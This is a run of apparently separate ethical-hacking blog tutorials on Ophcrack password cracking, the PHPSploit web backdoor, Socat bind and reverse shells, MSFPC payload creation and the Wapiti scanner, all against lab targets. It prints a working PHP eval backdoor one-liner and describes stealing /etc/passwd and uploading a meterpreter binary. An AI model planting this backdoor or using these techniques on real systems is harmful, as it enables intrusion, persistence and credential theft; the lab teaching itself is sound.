Author: Anamar Taknev

Hello, aspiring ethical hackers. In our previous blogpost, you learnt about password cracking. In this article, you will learn about a tool that cracks Windows log-in passwords offline. The name of this tool is Ophcrack.

Ophcrack is a free, open-source program that uses rainbow tables to crack Windows log-in passwords. It can import hashes in a variety of formats and can even dump them from SAM files of Windows. It can usually crack any password within minutes. It can be downloaded from here. Ophcrack is also available as a a LiveCD distribution that automatically retrieves, decrypts and cracking of passwords from a Windows system. LiveCD’s are available for Windows XP, Windows Vista and Windows 7.

Let’s see how Ophcrack works. For this tool to work, you need to have physical access to the computer whose password you want to crack. Let’s download Ophcrack-XP- live cd for this tutorial since I am testing this on a WIndows XP target. After downloading, you need to make a USB boot device out of this image. Then you need to boot from this USB device. This is what you will see as soon as Ophcrack boots.

Then, Ophcrack automatically starts loading and cracking hashes of passwords of the user accounts from the target system.

As you can see, Ophcrack cracked the password of user “Administrator”. The password is ‘123456’. All this happens automatically. On the statistics tab, you can see the stats of this tool.

On the preferences tab, you can set the preferences for this tool.

You can even load a single hash, PWDUMP file, session file or encrypted SAM file as shown below.

You have read at the beginning of this article that this tool this uses rainbow tables to crack Windows passwords. In the “Tables” option, you can see all the tables installed. You can also download and install other tables as required.

You can save the file with cracked passwords using “save” option. On the Ophcrack logout option, you can see cracked passwords or you can shutdown or reboot the system.

Hello, aspiring ethical hackers. In our previous blogpost, you have learnt what is backdoor. In this blogpost, you will learn about PHPSploit, a backdoor for web servers. PHPSploit is a fully featured command & control (C&C) framework that is used for persistence on web servers after gaining access. Let’s see how PHPSploit works and learn about its functions.

For this, we will be using Kali Linux as PHPSploit is available for download on Kali’s repositories by default. As target system, we will be using Metasploitable2 as part of our virtual hacking lab. Let’s see how it works.

PHPSploit can be started using the command shown below.

phpsploit

To place the PHPSploit backdoor on any target system, all you have to do is insert a PHP one liner into the code of the website. The PHP one liner is given below.

<?php @eval($_SERVER['HTTP-PHPSPLOIT']); ?>

I copy the above script into a PHP file named “bd.php” and upload this file to the target web server after web server hacking.

After uploading this file to the target web server, open PHPSploit on attacker system (Kali) and set the URL of the PHP backdoor as target as shown below. Then we have to run the command “exploit”. This gives us access as shown below.

Once the exploit is successful, the interface of PHPSploit shows the target IP address or the domain name on which we installed the backdoor. To view all the commands PHPSploit supports, type command “help”.

For example, let’s try “phpinfo” command that gives us the information about the web server.

To know the user account with whose privileges you compromised the target system, you have to use the “whoami” command.

PHPSploit also supports file system commands like cd, pwd, cat, ls etc.

Cat command can be used to view the contents of files on the target system. For example, let’s view the “/etc/passwd” file on the target Metasploitable2 system.

We can also download files from the target web server. For example, let’s download “/etc/passwd” file from the target system to the “/tmp” directory of our attacker system.

Here is the downloaded file.

Similarly, we can also upload files to the target system using the “upload” command. For example, let’s upload the meterpreter binary to the target system as shown below.

Hello, aspiring ethical hackers. In our previous blogpost, you learnt how to use netcat for various purposes in ethical hacking. In this blogpost, you will learn about another such tool named Socat.

Socat, shortcut for SOcket CAT is a command line utility that enables bidirectional data transfer between two independent data channels. Actually, it can provide multiple functions. It supports many protocols like TCP, UDP, SOCKS4 and OpenSSL.

Bind and Reverse shells

The use of socat tool comes after you completed gaining access to target network or device. Here, it helps you in maintaining access as channel for communication.

Let’s see how to create bind shells with socat (learn about different types of shells). For this, we will be using Metasploitable2 as target system in our virtual hacking lab. Note that socat should be installed on both target and attacker systems for this to work. To create a bind shell, run this command on the target system as shown below.

Then on the attacker system, we need to run this command.

Here’s our bind shell.

To create reverse shell, the above commands should be run on attacker and target system respectively.

Here’s our reverse shell.

Encrypted bind and reverse shell with socat

The above shells, although they are good, the data between them is transferred in plain text and is susceptible to sniffing and detection. No problems though. Socat can create an encrypted shell using OpenSSL.

To create an encrypted shell, first, we need to create a SSL key as shown below. Two files with extensions “.crt” and “.key” are created as shown below.

Then, we need to join this two files into one file with “.pem” file as shown below.

Now this file should be on the system on which we start our listener. For example, to create a bind shell, the “ssl.pem” should be on the target system. Then we need to run command as shown below.

Then, on attacker system we should run this command shown below.

Here’s the shell.

Similarly, we can also create a reverse shell.

File transfer

Socat can also be used to transfer files between two machines. For example, to transfer that SSL certificate we created above from attacker system to target system, the command to be run on the attacker system is shown below.

Then on the target system, we should run this command.

Hello, aspiring ethical hackers. In our previous blogpost, you learnt how to create payloads with msfvenom. In this blogpost, you will learn about MSFPC (MSFvenom payload creator), a tool that simplifies generation of Metasploit payloads with msfvenom.

MSFvenom payload creator (MSFPC) is a wrapper to generate multiple types of payloads based on users choice. The concept of this tool is to be as simple as possible while generating a payload.

Let’s see how to use this tool. For this, we will be using Kali Linux, as msfpc is installed by default on Kali Linux.

The simplest way to create a payload using MSFPC is to specify the type of payload you want. MSFPC can generate APK, ASP, ASPx, bash (-sh), Java (.jsp), Linux (.elf), OSX (macOS), Perl (.pl), PHP, PowerShell (.ps1), Python, Tomcat (.war) and Windows (.exe or dll) payloads.

For example, let’s see how to generate an exe payload.

The only option we need to set to create a payload with msfpc is the attacker system’s IP address or the listener address which can be selected from the given options. All other options are automatically set.

By default, this tool creates a reverse shell payload. We can also create a bind shell payload as shown below.

By default the listening port of the generated payload is set to 443. This can be changed as shown below.

We can also create payloads with this tool by specifying the target operating system.

MSFPC creates staged payloads by default. We can also create stageless payload as as shown below.

Hello, aspiring ethical hackers. In our previous blogpost on web application hacking and web server hacking, you learnt about various web vulnerabilities. In this blogpost, you will learn about Wapiti a web vulnerability scanner.

It is a very good practice to learn about the vulnerabilities and weaknesses in a website or web application before they hackers find bout them. Web vulnerability scanners play a very important role in detecting vulnerabilities. Wapiti is one such vulnerability scanner thats written in Python.

Unlike other vulnerability scanners, Wapiti works as a “Black Box” vulnerability scanner that instead of studying source code of the target web application, works by fuzzing and scanning the pages of web application, extract link forms, attacking the scripts, sending payloads, finding out error messages, special strings and other abnormal behaviours.

Let’s see how to find vulnerabilities using Wapiti. For this, we will be using Kali Linux as this tool is installed by default on Kali Systems. As target, we will be using Mutillidae web application on Metasploitable 2. See how to setup this virtual hacking lab.

The simplest way to use Wapiti is to just supply it with the target URL as shown below.

Then, Wapiti starts scanning the target as shown below.

Scope

Scope option of wapiti specifies it to what to scan. The scope option of wapiti takes four values: URL, page, folder, domain and punk. Here is the detailed explanation about these values.

1. URL: Setting this will only scan and attack the exact base URL given with -u option.
2. PAGE: Setting this as scope value will attack every URL matching the path of the base URL.
3. FOLDER: This will scan and attack every URL starting with the base URL value. This base URL should have a trailing slash (no file‐name).
4. DOMAIN: Setting this as scope value will scan and attack every URL whose domain name matches the one from the base URL.
5. PUNK: Setting this value will scan and attack every URL found whatever the domain. Think twice before using this for scope.

Let’s set the scope to “page” for now.

View all the modules (

Wapiti has many modules that help in vulnerability scanning. You can view all the modules using the “list modules” option.

Select a single module

You can select just a single module using the “-n” option. For example, let’s load the file module.

As you can see in the above image, a include vulnerability has been detected in the target web app.

Don’t resume the scan (–skip-crawl)

Sometimes, we abort a scanning session before it gets completed. When you start a new scan with Wapiti again, by default it resumes the aborted session by crawling the URLs again. If you don’t want to resume the previous scan from URL crawling, you can use this option. By using this option, Wapiti will attack only currently known URLs.

Resume from crawling

This option us useful in cases where the scan was previously aborted after wapiti started attacking. When a session is restored, the default behavior is to skip crawling. However, we can use this option to continue the scan process.

Flush attacks

This option specifies wapiti to forget everything about discovered vulnerabilities and which URL got attacked by which modules. Only the crawling information of the scan will be kept.

Flush session

This option specifies wapiti to forget everything about the target for the given scope.

Saving the output to a directory

Like many tools, you can save the output of the scan of wapiti in a report. This option enables you to specify a directory for saving the report of the scan.

Format of the reports (-f)

You can use this option to specify the format of the report. The reports can be saved in json, HTML, txt and xml. formats. For example, let’s set the report to be txt format.